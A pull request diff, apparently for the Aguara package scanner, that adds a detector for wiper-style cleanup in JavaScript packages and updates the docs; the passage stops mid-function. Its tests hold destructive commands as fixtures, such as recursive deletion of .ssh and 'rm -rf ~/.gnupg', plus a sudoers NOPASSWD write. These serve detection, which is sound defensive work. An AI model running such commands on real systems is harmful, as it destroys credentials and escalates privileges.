### PR TITLE
Detect destructive cleanup behavior in package code

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -4,7 +4,7 @@ This file provides guidance to Claude Code (claude.ai/code) when working with co
 
 ## Project Status
 
-Aguara v0.22.0 (2026-05-29). 193 YAML rules + 33 analyzer-emitted (226 cataloged), 13 categories, 9 scan analyzers (pattern, ci-trust, pkgmeta, jsrisk, pyrisk, rsbuild, NLP, toxicflow, rugpull) plus the `aguara check` incident command (npm/PyPI installed trees + pre-install npm lockfiles pnpm-lock.yaml / package-lock.json / yarn.lock classic, and Go/Rust/PHP/Ruby/Java/.NET lockfiles), 0 lint issues.
+Aguara v0.22.0 (2026-05-29). 193 YAML rules + 34 analyzer-emitted (227 cataloged), 13 categories, 9 scan analyzers (pattern, ci-trust, pkgmeta, jsrisk, pyrisk, rsbuild, NLP, toxicflow, rugpull) plus the `aguara check` incident command (npm/PyPI installed trees + pre-install npm lockfiles pnpm-lock.yaml / package-lock.json / yarn.lock classic, and Go/Rust/PHP/Ruby/Java/.NET lockfiles), 0 lint issues.
 
 Distribution: install.sh (mandatory checksum verification, bounded curl + retry), Homebrew tap, Docker (GHCR, multi-arch `linux/amd64+arm64`, runs as non-root UID 10001, base images digest-pinned, signed at digest with Cosign + SBOM + SLSA provenance attestations), GoReleaser (releases signed via Cosign keyless, SPDX SBOM per archive, `-trimpath` for reproducibility), GitHub Action, go install.
 
@@ -148,7 +148,7 @@ When completing a product task (fixing a bug, adding a feature, releasing a vers
 ### Data consistency rule
 
 When any of these values change, update ALL references across the vault:
-- Rule count (currently 193 YAML / 226 cataloged)
+- Rule count (currently 193 YAML / 227 cataloged)
 - Test count (currently ~750)
 - Coverage (currently 80%)
 - Star/fork count (currently 48/6)

--- a/README.md
+++ b/README.md
@@ -154,6 +154,7 @@ Beyond "is this package version known-bad," Aguara has analyzers that flag insta
 | Node downloads and runs a Bun second stage to evade Node-focused monitoring | `jsrisk` (`JS_BUN_SECOND_STAGE_001`) |
 | GitHub API used as a payload/command channel (write mutations, Octokit writes, REST git-data) | `jsrisk` (`JS_GITHUB_C2_001`) |
 | Host trust tampering: writes to sudoers, loader preload, CA stores, SSH, hosts/resolver | `jsrisk` (`JS_SUDOERS_TAMPER_001`, `JS_HOST_TRUST_TAMPER_001`) |
+| Destructive cleanup: deletes credential stores, agent files, evidence, or wipes the home directory | `jsrisk` (`JS_WIPER_TRIPWIRE_001`) |
 | Python install hook fetches remote JavaScript and runs it through `node -e` | `pyrisk` (`PY_IMPORTTIME_REMOTE_JS_001`) |
 | Rust `build.rs` reads wallet/keystore material and sends it to a network sink | `rsbuild` (`RS_BUILD_WALLET_EXFIL_001`) |
 
@@ -274,10 +275,10 @@ Aguara complements tools like Semgrep, Snyk, CodeQL, and traditional SCA: use th
 
 ## Rules
 
-Aguara exposes **226 cataloged detections** through `aguara list-rules`:
+Aguara exposes **227 cataloged detections** through `aguara list-rules`:
 
 - **193 embedded YAML pattern rules** across 13 categories
-- **33 analyzer-emitted detections** from ci-trust, pkgmeta, jsrisk, pyrisk, rsbuild, NLP, toxic-flow, and rug-pull
+- **34 analyzer-emitted detections** from ci-trust, pkgmeta, jsrisk, pyrisk, rsbuild, NLP, toxic-flow, and rug-pull
 
 Every YAML rule ships remediation text, surfaced in every output format and via `aguara explain <RULE_ID>`. Custom rules load from `--rules <dir>` (validated at load time; unknown fields rejected). See [RULES.md](RULES.md) for the full catalog with IDs and severities.
 

--- a/aguara_test.go
+++ b/aguara_test.go
@@ -281,6 +281,21 @@ fs.appendFileSync('/etc/sudoers.d/x', 'user ALL=(ALL) NOPASSWD:ALL');`,
 fs.writeFileSync('/etc/ld.so.preload', '/tmp/libx.so');`,
 		},
 		{
+			name:     "jsrisk wiper tripwire through public API",
+			filename: "index.js",
+			ruleID:   "JS_WIPER_TRIPWIRE_001",
+			content: `const fs = require('fs');
+fs.rmSync('.ssh', { recursive: true, force: true });`,
+		},
+		{
+			// shell delete co-occurs with CMDEXEC_004 on the same line; the
+			// wiper finding must survive cross-rule dedup.
+			name:     "jsrisk wiper shell delete survives dedup through public API",
+			filename: "index.js",
+			ruleID:   "JS_WIPER_TRIPWIRE_001",
+			content:  `require('child_process').execSync('rm -rf ~/.gnupg');`,
+		},
+		{
 			name:     "rsbuild wallet read -> network through public API",
 			filename: "build.rs",
 			ruleID:   "RS_BUILD_WALLET_EXFIL_001",

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -54,6 +54,7 @@ const (
 	RuleGitHubC2         = "JS_GITHUB_C2_001"
 	RuleSudoersTamper    = "JS_SUDOERS_TAMPER_001"
 	RuleHostTrustTamper  = "JS_HOST_TRUST_TAMPER_001"
+	RuleWiperTripwire    = "JS_WIPER_TRIPWIRE_001"
 )
 
 // Detection thresholds. Chosen to leave room for ordinary minified
@@ -1568,8 +1569,18 @@ func shellScriptFromArgv(args []byte) ([]byte, bool) {
 			return nil, false
 		}
 		if dashCBareRe.Match(flag) {
-			cmd, _, ok := shellStringLiteralAt(args, end)
+			cmd, cmdEnd, ok := shellStringLiteralAt(args, end)
 			if !ok {
+				return nil, false
+			}
+			// The script must be a plain literal: the next significant byte
+			// after it is an argument separator or the array close, never an
+			// expression tail (`'...' + x`, `'...'.replace(...)`).
+			r := cmdEnd
+			for r < len(args) && (args[r] == ' ' || args[r] == '\t' || args[r] == '\n' || args[r] == '\r') {
+				r++
+			}
+			if r < len(args) && args[r] != ',' && args[r] != ']' && args[r] != ')' {
 				return nil, false
 			}
 			return cmd, true
@@ -1590,6 +1601,31 @@ func shellScriptFromCommandString(s []byte) ([]byte, bool) {
 		return s[m[1]:], true
 	}
 	return nil, false
+}
+
+// wholeStringLiteralInterior returns the interior of arg when arg is a SINGLE
+// STATIC string literal spanning the whole argument (no concatenation tail or
+// surrounding expression). A concatenated/variable command ('cmd' + x, cmdVar)
+// yields ok=false, and a backtick template literal carrying a `${...}`
+// interpolation is dynamic JS (the interpolated value is unknown and is NOT a
+// shell $HOME), so it also yields ok=false.
+func wholeStringLiteralInterior(arg []byte) ([]byte, bool) {
+	i := 0
+	for i < len(arg) && (arg[i] == ' ' || arg[i] == '\t' || arg[i] == '\n' || arg[i] == '\r') {
+		i++
+	}
+	if i >= len(arg) || (arg[i] != '\'' && arg[i] != '"' && arg[i] != '`') {
+		return nil, false
+	}
+	quote := arg[i]
+	interior, end, ok := shellStringLiteralAt(arg, i)
+	if !ok || len(bytes.TrimSpace(arg[end:])) > 0 {
+		return nil, false
+	}
+	if quote == '`' && bytes.Contains(interior, []byte("${")) {
+		return nil, false // JS template interpolation, not a static command
+	}
+	return interior, true
 }
 
 // shellStringLiteralAt returns the interior and the index past the closing
@@ -1685,42 +1721,19 @@ func isDomainLabelByte(c byte) bool {
 	return c >= 'a' && c <= 'z' || c >= '0' && c <= '9' || c == '-'
 }
 
-// detectHostTamper emits JS_SUDOERS_TAMPER_001 / JS_HOST_TRUST_TAMPER_001 when
-// package code performs a REAL write to a sensitive host surface (a bound fs
-// write whose path argument is the surface, or a bound child_process / execa /
-// shelljs command that redirects / tees / sed -i's into it). It is
-// self-contained like detectDNSTXTExfil: it recomputes the lexical view and
-// call sites from content and reads only the partner booleans off m.
-func detectHostTamper(path string, m *metrics, content []byte) []types.Finding {
-	view := newJSLexicalView(content)
+// collectBoundShellCommands returns the shell command/script bytes and the
+// call-start offset for every BOUND shell execution: child_process exec /
+// execSync (first arg = command), shelljs.exec, and a shell launched via
+// spawn / execa with -c (the extracted -c script). A program API that does
+// not run a shell, a db.exec, a stringified example, and a plain execa pass
+// arguments literally and are excluded. Shared by the host-tamper and
+// wiper-tripwire detectors.
+func collectBoundShellCommands(view jsLexicalView, stringRanges [][2]int) (scripts [][]byte, starts []int) {
 	code := view.Code
-	stringRanges := view.StringRanges
-	fsCalls := collectFSWriteCalls(code, stringRanges)
 	cpCalls := collectChildProcessCalls(code)
 	shelljsCalls := collectShelljsExecCalls(code)
 	execaMatches := execaCallRe.FindAllIndex(code, -1)
-
-	// Only shell-INTERPRETING calls parse redirects: child_process exec /
-	// execSync run `/bin/sh -c`, and shelljs.exec runs a shell. Program APIs
-	// (spawn, spawnSync, execFile, execFileSync) and execa (no shell by
-	// default) pass their arguments literally, so a `>>`-looking string there
-	// is a plain argument, not a redirect.
-	// Only the FIRST argument is interpreted by the shell; a redirect-looking
-	// string in an options/env/callback argument is not a write. Bound to the
-	// first arg via firstArgEnd.
-	//
-	// KNOWN LIMITS (no shell parser, per the rule's scope):
-	//   - the redirect/tee scan is not shell-quote-aware, so a command that
-	//     merely PRINTS a quoted redirect string (`echo "x >> /etc/x"`) can
-	//     over-fire, and distinguishing it from a real quoted tee target needs
-	//     shell-quote parsing the analyzer does not do;
-	//   - content is bound to the FIRST redirect/tee per command, so a second
-	//     write to the same path in one command, and a payload that lives
-	//     inside a `sed` script rather than before the operator, are not
-	//     inspected for the domain/grant gate.
-	var shellArgs [][]byte
-	var shellStarts []int
-	addShell := func(start, argsStart int) {
+	add := func(start, argsStart int) {
 		if start < 0 || view.InString(start) {
 			return
 		}
@@ -1728,18 +1741,18 @@ func detectHostTamper(path string, m *metrics, content []byte) []types.Finding {
 		if argEnd <= argsStart {
 			return
 		}
-		shellArgs = append(shellArgs, code[argsStart:argEnd])
-		shellStarts = append(shellStarts, start)
+		// The command must be a SINGLE string literal spanning the whole first
+		// argument; a concatenated / variable command is dynamic and skipped.
+		if interior, ok := wholeStringLiteralInterior(code[argsStart:argEnd]); ok {
+			scripts = append(scripts, interior)
+			starts = append(starts, start)
+		}
 	}
 	for _, s := range cpCalls {
 		switch s.Method {
 		case "exec", "execsync":
-			// exec / execSync run `/bin/sh -c <first arg>`.
-			addShell(s.Start, s.ArgsStart)
+			add(s.Start, s.ArgsStart)
 		case "spawn", "spawnsync", "execfile", "execfilesync":
-			// A program API still runs a shell when the program IS a shell
-			// with -c; only the argument right after -c is the script (later
-			// array elements are positional params $0,$1,...), so scan that.
 			if s.Start < 0 || view.InString(s.Start) {
 				continue
 			}
@@ -1750,20 +1763,24 @@ func detectHostTamper(path string, m *metrics, content []byte) []types.Finding {
 			}
 			if spawnRunsShell(code[s.ArgsStart:argEnd], full) {
 				if script, ok := shellScriptFromArgv(full); ok {
-					shellArgs = append(shellArgs, script)
-					shellStarts = append(shellStarts, s.Start)
+					scripts = append(scripts, script)
+					starts = append(starts, s.Start)
 				}
 			}
 		}
 	}
 	for _, s := range shelljsCalls {
-		addShell(s.Start, s.ArgsStart)
+		add(s.Start, s.ArgsStart)
 	}
-	// execa shells out only via execa('sh',['-c',...]) or
-	// execaCommand('sh -c "..."'); a plain execa parses args without a shell.
 	for _, loc := range execaMatches {
 		start, argsStart := loc[0], loc[1]
 		if view.InString(start) {
+			continue
+		}
+		// Require a bare execa call (the imported function), not a method on a
+		// local object: `runner.execaCommand(...)` is an unbound helper, not the
+		// execa package.
+		if start > 0 && code[start-1] == '.' {
 			continue
 		}
 		argEnd := firstArgEnd(code, argsStart-1, stringRanges)
@@ -1778,13 +1795,39 @@ func detectHostTamper(path string, m *metrics, content []byte) []types.Finding {
 		case spawnRunsShell(firstArg, full):
 			script, ok = shellScriptFromArgv(full)
 		case shellCommandStrRe.Match(firstArg):
-			script, ok = shellScriptFromCommandString(firstArg)
+			// Reject a concatenated execaCommand ('sh -c "..."' + '.bak').
+			if _, lit := wholeStringLiteralInterior(firstArg); lit {
+				script, ok = shellScriptFromCommandString(firstArg)
+			}
 		}
 		if ok {
-			shellArgs = append(shellArgs, script)
-			shellStarts = append(shellStarts, start)
+			scripts = append(scripts, script)
+			starts = append(starts, start)
 		}
 	}
+	return scripts, starts
+}
+
+// detectHostTamper emits JS_SUDOERS_TAMPER_001 / JS_HOST_TRUST_TAMPER_001 when
+// package code performs a REAL write to a sensitive host surface (a bound fs
+// write whose path argument is the surface, or a bound child_process / execa /
+// shelljs command that redirects / tees / sed -i's into it). It is
+// self-contained like detectDNSTXTExfil: it recomputes the lexical view and
+// call sites from content and reads only the partner booleans off m.
+func detectHostTamper(path string, m *metrics, content []byte) []types.Finding {
+	view := newJSLexicalView(content)
+	code := view.Code
+	stringRanges := view.StringRanges
+	fsCalls := collectFSWriteCalls(code, stringRanges)
+
+	// Shell content is the bound command string (exec/execSync first arg,
+	// shelljs.exec, or the -c script of a spawn/execa shell). KNOWN LIMITS
+	// (no shell parser, per the rule's scope): the redirect/tee scan is not
+	// shell-quote-aware, so a command that merely PRINTS a quoted redirect
+	// string (`echo "x >> /etc/x"`) can over-fire; and content is bound to the
+	// FIRST redirect/tee per command, so a second write to the same path in
+	// one command, and a payload inside a `sed` script, are not inspected.
+	shellArgs, shellStarts := collectBoundShellCommands(view, stringRanges)
 
 	indexAll := func(needle string) []int {
 		var idxs []int
@@ -1980,6 +2023,1027 @@ func detectHostTamper(path string, m *metrics, content []byte) []types.Finding {
 		})
 	}
 	return out
+}
+
+// --- JS_WIPER_TRIPWIRE_001: destructive cleanup / wiper behaviour ---
+
+// A delete's reach depends on the method AND its recursive flag/option:
+//   - canDirFinal: can remove a (final) directory -- rmdir, rm -d, anything
+//     recursive. Needed to delete a credential-store directory like .ssh.
+//   - canRecursive: can recursively wipe a populated directory tree -- rm -r /
+//     fs.rm({recursive:true}) / fs-extra remove/emptyDir / rimraf / find
+//     -delete. Needed for a broad home/root wipe.
+//
+// unlink and a non-recursive rm/fs.rm remove FILES only, so they never satisfy
+// either: they cannot wipe a directory or root.
+type fsDeleteCall struct {
+	pathStart, pathEnd        int
+	canDirFinal, canRecursive bool
+}
+
+// delete method base modes (before the recursive flag/option is applied).
+const (
+	delModeFile      = iota // unlink: files only
+	delModeRmdir            // rmdir: empty/final dir; recursive only with the option
+	delModeRm               // rm: file; directory only with recursive
+	delModeRecursive        // remove/emptyDir/rimraf: always recursive
+)
+
+// deleteMethodCap describes a delete method. fsExtra methods (remove/emptyDir)
+// exist only on fs-extra, so a core `fs` binding cannot call them.
+type deleteMethodCap struct {
+	mode    int
+	fsExtra bool
+}
+
+// fsDeleteMethodCaps is keyed by the LOWERCASED method name.
+var fsDeleteMethodCaps = map[string]deleteMethodCap{
+	"rm":           {mode: delModeRm},
+	"rmsync":       {mode: delModeRm},
+	"rmdir":        {mode: delModeRmdir},
+	"rmdirsync":    {mode: delModeRmdir},
+	"unlink":       {mode: delModeFile},
+	"unlinksync":   {mode: delModeFile},
+	"remove":       {mode: delModeRecursive, fsExtra: true},
+	"removesync":   {mode: delModeRecursive, fsExtra: true},
+	"emptydir":     {mode: delModeRecursive, fsExtra: true},
+	"emptydirsync": {mode: delModeRecursive, fsExtra: true},
+}
+
+// recursiveOptTrueRe matches a `recursive: true` (or `!0`) option, with an
+// optionally quoted key. A literal `recursive: false`, a variable, or the bare
+// key absent leaves recursion off, so `fs.rmSync(p, { recursive: false })`
+// cannot wipe a directory.
+var recursiveOptTrueRe = regexp.MustCompile(`\brecursive["']?\s*:\s*(?:true|!0)\b`)
+
+// optsHaveTopLevelRecursiveTrue reports whether the options argument sets
+// `recursive: true` at the TOP level of the options object. A nested
+// `recursive: true` (`{ recursive: false, retry: { recursive: true } }`) does
+// not enable Node's recursive removal, so it must not grant the capability.
+func optsHaveTopLevelRecursiveTrue(opts []byte) bool {
+	for _, loc := range recursiveOptTrueRe.FindAllIndex(opts, -1) {
+		depth := 0
+		for i := 0; i < loc[0]; i++ {
+			switch opts[i] {
+			case '{', '[', '(':
+				depth++
+			case '}', ']', ')':
+				depth--
+			}
+		}
+		if depth == 1 { // directly inside the options object's braces
+			return true
+		}
+	}
+	return false
+}
+
+// fsBindingIsPromisesOnly reports whether recv is bound to fs/promises (or
+// fs.promises) and not also a regular fs alias, so its API is async-only and a
+// *Sync method on it does not exist.
+func fsBindingIsPromisesOnly(b moduleBindings, recv string) bool {
+	return !b.aliases[recv] && b.sourceByLocal[recv] == "promises"
+}
+
+// deleteModeCaps resolves a base mode plus a recursive flag/option into the two
+// capability bits.
+func deleteModeCaps(mode int, optRecursive bool) (canDirFinal, canRecursive bool) {
+	switch mode {
+	case delModeRmdir:
+		return true, optRecursive
+	case delModeRm:
+		return optRecursive, optRecursive
+	case delModeRecursive:
+		return true, true
+	default: // delModeFile
+		return false, false
+	}
+}
+
+// fsExtra* regexes detect bindings to the fs-extra module specifically, so the
+// fs-extra-only delete methods (remove/emptyDir) are not credited to a core
+// `fs` binding.
+var fsExtraAliasRe = regexp.MustCompile(`(?:(?:const|let|var)\s+|,\s*)([A-Za-z_$][\w$]*)\s*=\s*require\s*\(\s*['"]fs-extra['"]\s*\)`)
+var fsExtraAliasESMRe = regexp.MustCompile(`import\s+(?:\*\s+as\s+)?([A-Za-z_$][\w$]*)\s+from\s*['"]fs-extra['"]`)
+var fsExtraDestructureRe = regexp.MustCompile(`(?:const|let|var)\s+\{\s*([^}]+)\s*\}\s*=\s*require\s*\(\s*['"]fs-extra['"]\s*\)`)
+var fsExtraDestructureESMRe = regexp.MustCompile(`import\s+(?:[A-Za-z_$][\w$]*\s*,\s*)?\{\s*([^}]+)\s*\}\s+from\s*['"]fs-extra['"]`)
+var fsExtraAliasESMCombinedRe = regexp.MustCompile(`import\s+([A-Za-z_$][\w$]*)\s*,\s*(?:\*\s+as\s+[A-Za-z_$][\w$]*|\{[^}]+\})\s+from\s*['"]fs-extra['"]`)
+
+var fsDeleteReceiverRe = regexp.MustCompile(
+	jsIdentBoundary + `([A-Za-z_$][\w$]*)\s*\.\s*(rm(?:dir)?(?:Sync)?|unlink(?:Sync)?|remove(?:Sync)?|emptyDir(?:Sync)?)\s*\(`)
+var fsPromisesDeleteReceiverRe = regexp.MustCompile(
+	jsIdentBoundary + `([A-Za-z_$][\w$]*)\s*\.\s*promises\s*\.\s*(rm(?:dir)?(?:Sync)?|unlink(?:Sync)?|remove(?:Sync)?|emptyDir(?:Sync)?)\s*\(`)
+var inlineRequireFsDeleteRe = regexp.MustCompile(
+	jsIdentBoundary + `require\s*\(\s*['"](?:node:)?(fs|fs-extra|fs/promises)['"]\s*\)(?:\s*\.\s*promises)?\s*\.\s*(rm(?:dir)?(?:Sync)?|unlink(?:Sync)?|remove(?:Sync)?|emptyDir(?:Sync)?)\s*\(`)
+
+// rimraf binding: default (require('rimraf') / import rimraf from 'rimraf')
+// and named (const { rimraf } = require('rimraf') / import { rimraf } from
+// 'rimraf'), the modern rimraf v4+ API. Every export of rimraf deletes, so any
+// destructured local is a delete sink.
+var rimrafAliasRe = regexp.MustCompile(`(?:(?:const|let|var)\s+|,\s*)([A-Za-z_$][\w$]*)\s*=\s*require\s*\(\s*['"]rimraf['"]\s*\)`)
+var rimrafAliasESMRe = regexp.MustCompile(`import\s+(?:\*\s+as\s+)?([A-Za-z_$][\w$]*)\s+from\s*['"]rimraf['"]`)
+
+// rimrafAliasESMCombinedRe captures the DEFAULT alias of a combined import
+// (`import rimraf, { sync } from 'rimraf'`).
+var rimrafAliasESMCombinedRe = regexp.MustCompile(`import\s+([A-Za-z_$][\w$]*)\s*,\s*\{[^}]+\}\s+from\s*['"]rimraf['"]`)
+var rimrafDestructureRe = regexp.MustCompile(`(?:const|let|var)\s+\{\s*([^}]+)\s*\}\s*=\s*require\s*\(\s*['"]rimraf['"]\s*\)`)
+
+// rimrafNamedESMRe captures the named bindings, allowing an optional default
+// alias before them (`import rimraf, { sync } from 'rimraf'`).
+var rimrafNamedESMRe = regexp.MustCompile(`import\s+(?:[A-Za-z_$][\w$]*\s*,\s*)?\{\s*([^}]+)\s*\}\s+from\s*['"]rimraf['"]`)
+
+// rimrafReceiverCallRe matches a property call on a rimraf namespace/default
+// alias (rr.rimraf(...), rr.sync(...)); submatch 1 is the receiver, which the
+// caller verifies is a rimraf binding. Every rimraf export deletes.
+var rimrafReceiverCallRe = regexp.MustCompile(jsIdentBoundary + `([A-Za-z_$][\w$]*)\s*\.\s*[A-Za-z_$][\w$]*\s*\(`)
+
+// inlineRimrafRe matches an inline require('rimraf') invocation, called
+// directly (`require('rimraf')('.ssh')`) or via a property
+// (`require('rimraf').sync('.ssh')`).
+var inlineRimrafRe = regexp.MustCompile(jsIdentBoundary + `require\s*\(\s*['"]rimraf['"]\s*\)(?:\s*\.\s*[A-Za-z_$][\w$]*)?\s*\(`)
+
+// Broad-home-wipe path-argument shapes. os.homedir() must be a real Node os
+// binding (a mock object named os does not count); process.env.HOME is global.
+var inlineRequireOsHomedirRe = regexp.MustCompile(`^\s*require\s*\(\s*['"](?:node:)?os['"]\s*\)\s*\.\s*homedir\s*\(\s*\)\s*$`)
+var homedirReceiverRe = regexp.MustCompile(`^\s*([A-Za-z_$][\w$]*)\s*\.\s*homedir\s*\(\s*\)\s*$`)
+var homedirBareRe = regexp.MustCompile(`^\s*([A-Za-z_$][\w$]*)\s*\(\s*\)\s*$`)
+
+// isBroadHomePathArg reports whether the fs delete path argument resolves to
+// the whole home directory: process.env.HOME, an inline require('os').homedir(),
+// <osAlias>.homedir() for a real os import, or a destructured homedir() from os.
+func isBroadHomePathArg(parg []byte, osBindings moduleBindings) bool {
+	s := bytes.TrimSpace(parg)
+	switch string(s) {
+	case "process.env.HOME", "process.env['HOME']", `process.env["HOME"]`:
+		return true
+	}
+	if inlineRequireOsHomedirRe.Match(s) {
+		return true
+	}
+	if m := homedirReceiverRe.FindSubmatch(s); m != nil && osBindings.aliases[string(m[1])] {
+		return true
+	}
+	if m := homedirBareRe.FindSubmatch(s); m != nil && osBindings.sourceByLocal[string(m[1])] == "homedir" {
+		return true
+	}
+	return false
+}
+
+// collectFSDeleteCalls mirrors collectFSWriteCalls for delete sinks: fs /
+// fs-extra rm/rmdir/unlink/remove/emptyDir on a verified fs binding, plus
+// rimraf bound from the rimraf module. Returns the first-argument (path)
+// ranges; the path token / os.homedir() target is read from there.
+func collectFSDeleteCalls(stripped []byte, stringRanges [][2]int) []fsDeleteCall {
+	fsBindings := collectModuleBindings(stripped, stringRanges,
+		fsModuleAliasRe, fsModuleAliasESMRe, fsDestructureRe, fsDestructureESMRe, fsModuleAliasESMCombinedRe)
+	fsExtraBindings := collectModuleBindings(stripped, stringRanges,
+		fsExtraAliasRe, fsExtraAliasESMRe, fsExtraDestructureRe, fsExtraDestructureESMRe, fsExtraAliasESMCombinedRe)
+	// Aliases bound to fs/promises (or fs.promises): async-only, so a *Sync
+	// method on them does not exist.
+	fsPromisesAliases := map[string]bool{}
+	for _, re := range []*regexp.Regexp{fsPromisesAliasRequireRe, fsPromisesAliasDotRe, fsPromisesAliasESMRe, fsPromisesAliasESMCombinedRe} {
+		for _, mt := range re.FindAllSubmatchIndex(stripped, -1) {
+			if insideStringInterior(stringRanges, mt[0]) {
+				continue
+			}
+			fsPromisesAliases[string(stripped[mt[2]:mt[3]])] = true
+		}
+	}
+	isPromisesOnly := func(recv string) bool {
+		return fsPromisesAliases[recv] || fsBindingIsPromisesOnly(fsBindings, recv)
+	}
+	// Locals destructured directly from fs/promises: a *Sync local
+	// (`const { rmSync } = require('fs/promises')`) does not exist.
+	fsPromisesLocals := map[string]bool{}
+	addPromisesLocals := func(body string, sep string) {
+		for _, raw := range strings.Split(body, ",") {
+			local := strings.TrimSpace(raw)
+			if i := strings.Index(local, sep); i >= 0 {
+				local = strings.TrimSpace(local[i+len(sep):])
+			}
+			if local != "" {
+				fsPromisesLocals[local] = true
+			}
+		}
+	}
+	for _, mt := range fsPromisesDestructureRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		addPromisesLocals(string(stripped[mt[2]:mt[3]]), ":")
+	}
+	for _, mt := range fsPromisesDestructureESMRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		addPromisesLocals(string(stripped[mt[2]:mt[3]]), " as ")
+	}
+	var calls []fsDeleteCall
+	add := func(matchEnd, mode int) {
+		openParen := matchEnd - 1
+		argEnd := firstArgEnd(stripped, openParen, stringRanges)
+		if argEnd <= openParen {
+			return
+		}
+		// rm/rmdir reach a directory only with { recursive: true } in the
+		// options argument; remove/emptyDir/rimraf are always recursive. A
+		// literal { recursive: false } leaves recursion off.
+		opts := fsDataArg(stripped, argEnd, stringRanges)
+		optRecursive := optsHaveTopLevelRecursiveTrue(opts)
+		dirFinal, recursive := deleteModeCaps(mode, optRecursive)
+		calls = append(calls, fsDeleteCall{openParen + 1, argEnd, dirFinal, recursive})
+	}
+	for _, mt := range fsDeleteReceiverRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[2]) {
+			continue
+		}
+		recv := string(stripped[mt[2]:mt[3]])
+		if !fsBindings.aliases[recv] && fsBindings.sourceByLocal[recv] != "promises" {
+			continue
+		}
+		method := strings.ToLower(string(stripped[mt[4]:mt[5]]))
+		// fs/promises exposes async methods only; a *Sync method on a promises
+		// binding does not exist, so no deletion occurs.
+		if isPromisesOnly(recv) && strings.HasSuffix(method, "sync") {
+			continue
+		}
+		cap := fsDeleteMethodCaps[method]
+		// remove/emptyDir exist only on fs-extra; reject on a core fs binding.
+		if cap.fsExtra && !fsExtraBindings.aliases[recv] {
+			continue
+		}
+		add(mt[1], cap.mode)
+	}
+	for _, mt := range fsWriteBareCallRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[2]) {
+			continue
+		}
+		local := string(stripped[mt[2]:mt[3]])
+		method := fsBindings.sourceByLocal[local]
+		methodLower := strings.ToLower(method)
+		// A *Sync local destructured from fs/promises does not exist.
+		if fsPromisesLocals[local] && strings.HasSuffix(methodLower, "sync") {
+			continue
+		}
+		cap, ok := fsDeleteMethodCaps[methodLower]
+		if !ok {
+			continue
+		}
+		if cap.fsExtra && fsExtraBindings.sourceByLocal[local] != method {
+			continue
+		}
+		add(mt[1], cap.mode)
+	}
+	for _, mt := range fsPromisesDeleteReceiverRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[2]) {
+			continue
+		}
+		recv := string(stripped[mt[2]:mt[3]])
+		if !fsBindings.aliases[recv] && fsBindings.sourceByLocal[recv] != "promises" {
+			continue
+		}
+		method := strings.ToLower(string(stripped[mt[4]:mt[5]]))
+		// The `.promises` namespace is async-only; a *Sync method there does
+		// not exist.
+		if strings.HasSuffix(method, "sync") {
+			continue
+		}
+		cap := fsDeleteMethodCaps[method]
+		if cap.fsExtra && !fsExtraBindings.aliases[recv] {
+			continue
+		}
+		add(mt[1], cap.mode)
+	}
+	for _, mt := range inlineRequireFsDeleteRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		module := string(stripped[mt[2]:mt[3]])
+		method := strings.ToLower(string(stripped[mt[4]:mt[5]]))
+		// fs/promises and the fs.promises namespace are async-only: a *Sync
+		// method does not exist there.
+		if (module == "fs/promises" || bytes.Contains(stripped[mt[0]:mt[1]], []byte(".promises"))) &&
+			strings.HasSuffix(method, "sync") {
+			continue
+		}
+		cap := fsDeleteMethodCaps[method]
+		if cap.fsExtra && module != "fs-extra" {
+			continue
+		}
+		add(mt[1], cap.mode)
+	}
+	// Inline require('rimraf')(...) / require('rimraf').sync(...): rimraf
+	// removes directories recursively, so it is always dir-capable.
+	for _, mt := range inlineRimrafRe.FindAllIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		add(mt[1], delModeRecursive)
+	}
+	// rimraf(path), bound from the rimraf import (default or named).
+	rimrafAliases := map[string]bool{}
+	for _, mm := range rimrafAliasRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mm[2]) {
+			continue
+		}
+		rimrafAliases[string(stripped[mm[2]:mm[3]])] = true
+	}
+	for _, mm := range rimrafAliasESMRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mm[2]) {
+			continue
+		}
+		rimrafAliases[string(stripped[mm[2]:mm[3]])] = true
+	}
+	for _, mm := range rimrafAliasESMCombinedRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mm[2]) {
+			continue
+		}
+		rimrafAliases[string(stripped[mm[2]:mm[3]])] = true
+	}
+	addRimrafDestructure := func(body string, sep string) {
+		for _, raw := range strings.Split(body, ",") {
+			local := strings.TrimSpace(raw)
+			if i := strings.Index(local, sep); i >= 0 {
+				local = strings.TrimSpace(local[i+len(sep):])
+			}
+			if i := strings.Index(local, "="); i >= 0 {
+				local = strings.TrimSpace(local[:i])
+			}
+			if local != "" {
+				rimrafAliases[local] = true
+			}
+		}
+	}
+	for _, mm := range rimrafDestructureRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mm[2]) {
+			continue
+		}
+		addRimrafDestructure(string(stripped[mm[2]:mm[3]]), ":")
+	}
+	for _, mm := range rimrafNamedESMRe.FindAllSubmatchIndex(stripped, -1) {
+		if insideStringInterior(stringRanges, mm[2]) {
+			continue
+		}
+		addRimrafDestructure(string(stripped[mm[2]:mm[3]]), " as ")
+	}
+	if len(rimrafAliases) > 0 {
+		for _, mm := range fsWriteBareCallRe.FindAllSubmatchIndex(stripped, -1) {
+			if insideStringInterior(stringRanges, mm[2]) {
+				continue
+			}
+			if rimrafAliases[string(stripped[mm[2]:mm[3]])] {
+				add(mm[1], delModeRecursive)
+			}
+		}
+		// Namespace property calls: rr.rimraf(...), rr.sync(...).
+		for _, mm := range rimrafReceiverCallRe.FindAllSubmatchIndex(stripped, -1) {
+			if insideStringInterior(stringRanges, mm[2]) {
+				continue
+			}
+			if rimrafAliases[string(stripped[mm[2]:mm[3]])] {
+				add(mm[1], delModeRecursive)
+			}
+		}
+	}
+	return calls
